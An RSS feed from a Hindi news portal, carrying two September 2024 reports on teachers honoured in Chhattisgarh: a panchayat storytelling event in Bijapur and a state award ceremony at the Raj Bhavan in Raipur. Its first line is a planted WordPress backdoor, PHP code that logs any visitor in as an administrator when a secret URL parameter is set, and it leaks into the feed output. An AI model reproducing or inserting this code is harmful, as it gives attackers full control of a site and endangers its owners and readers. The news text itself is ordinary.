// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); teachers honored – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 08 Sep 2024 21:35:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-रायपुर में हुआ ‘गांव की कहानी पंचायत की जुबानी’ कार्यक्रम, शिक्षकों को किया सम्मानित https://pratyushaashakinayikiran.com/?p=67904 Sun, 08 Sep 2024 21:35:00 +0000 https://pratyushaashakinayikiran.com/?p=67904 रायपुर.

पंचायत विभाग के मार्ग दर्शन में गांव की कहानी पंचायत की जुबानी कार्यक्रम के अंतर्गत मुख्य रूप से ग्राम पंचायत गंगालूर, संगमपल्ली, धनोरा, गुदमा, मुरकीनार, उसूर, बासागुड़ा आदि पंचायतों में कार्यक्रम सम्पन्न हुआ।  ग्राम पंचायत गंगालूर के कन्या पोटाकेबिन में पांच संकुल के शिक्षकों को शिक्षक दिवस के अवसर पर सम्मानित किया गया।

कार्यक्रम का शुभारंभ जिला पंचायत सदस्य श्रीमती बी पुष्पा राव तथा जनप्रतिनिधि सरपंच श्री राजू कलमू, भूतपूर्व जनपद सदस्य बुधराम हेमला, उपसरपंच लच्छू हेमला तथा ग्रामवासी द्वारा किया गया। शिक्षक दिवस के अवसर पर छात्रों के द्वारा रंगारंग सांस्कृतिक कार्यक्रम प्रस्तुत किया गया। जनप्रतिनिधियों के द्वारा शिक्षकों को सम्मानित किया गया। उक्त कार्यक्रम का उद्देश्य पंचायत के लोगों के द्वारा बच्चों को कहानियों के माध्यम से शिक्षा के स्तर में हुए सुधार, ग्राम पंचायत के इतिहास आदि के बारे में बच्चों को गोंडी भाषा में अवगत कराया गया। यह कार्यक्रम जिले के अलग अलग पंचायतों में अलग अलग जनपद पंचायत के अधिकारियों के उपस्थिति में आयोजित हुआ। जिला पंचायत के मुख्य कार्यपालन अधिकारी श्री हेमंत रमेश नंदनवार, जनपद पंचायत बीजापुर के मुख्य कार्यपालन अधिकारी गीत कुमार सिन्हा, एपीसी मोहम्मद जाकिर खान, ग्राम पंचायत के जन प्रतिनिधि, गांधी फेलो निहाल कुमार मिश्रा, शिप्रा पाण्डे, स्नेहा लवनकर, मांशू शुक्ला, अरुण कुमार प्रोग्राम लीडर पीरामल फाउण्डेशन तथा सीएससी रमन झा, नवल यादव, रुपसाय सोन,े कमल सिंह यादव, सुनील कुमार झाड़ी तथा गणमान्य नागरिक एवं सभी संस्था के संस्था प्रमुख शिक्षक-शिक्षिकाएं एवं बड़ी संख्या में उपस्थित बच्चों के बीच यह कार्यक्रम संपन्न हुआ।

]]>
छत्तीसगढ़-रायपुर के राजभवन में आज 55 शिक्षक होंगे सम्मानित, राज्यपाल देंगे तीन को राज्य स्तरीय पुरस्कार https://pratyushaashakinayikiran.com/?p=66532 Thu, 05 Sep 2024 14:36:00 +0000 https://pratyushaashakinayikiran.com/?p=66532 रायपुर.

शिक्षक दिवस के अवसर पर आज गुरुवार को राजधानी रायपुर स्थित राजभवन में राज्यस्तरीय शिक्षक सम्मान समारोह कार्यक्रम का आयोजन होगा। इस कार्यक्रम के मुख्य अतिथि राज्यपाल रमेन डेका होंगे, जो राज्य के 55 शिक्षकों को पुरस्कृत करेंगे। राजभवन में कार्यक्रम की अध्यक्षता मुख्यमंत्री विष्णुदेव साय करेंगे।

शिक्षक दिवस के अवसर पर तीन शिक्षकों को अलग-अलग साहित्यकारों के नाम से राज्य शिक्षक स्मृति पुरस्कार दिए जाएंगे। साथ ही 52 शिक्षकों को राज्य शिक्षक सम्मान से सम्मानित किया जाएगा। राज्य शिक्षक सम्मान में 21 हजार रुपए और स्मृति पुरस्कार प्राप्त शिक्षकों को 51 हजार रुपए की राशि दी जाएगी। सभी शिक्षकों को उनके क्षेत्र में बेहतर काम करने के लिए सम्मानित किया जा रहा है। शिक्षक दिवस के अवसर पर राज्य स्तरीय समारोह में बिलासपुर जिले की व्याखाता डॉ. रश्मि सिंह धुर्वे को डॉ. पदुमलाल पुन्नालाल बक्शी स्मृति पुरस्कार, कबीरधाम जिले के शिक्षक री राजर्षि पांडेय को डॉ. मुकुटधर पांडेय स्मृति पुरस्कार, दुर्ग जिले की उच्च वर्ग शिक्षक डॉ. सरिता साहू को डॉ. बलदेव प्रसाद मिश्र स्मृति पुरस्कार दिया जाएगा। शेष 52 शिक्षकों को राज्य शिक्षक सम्मान से सम्मानित किया जाएगा।

]]>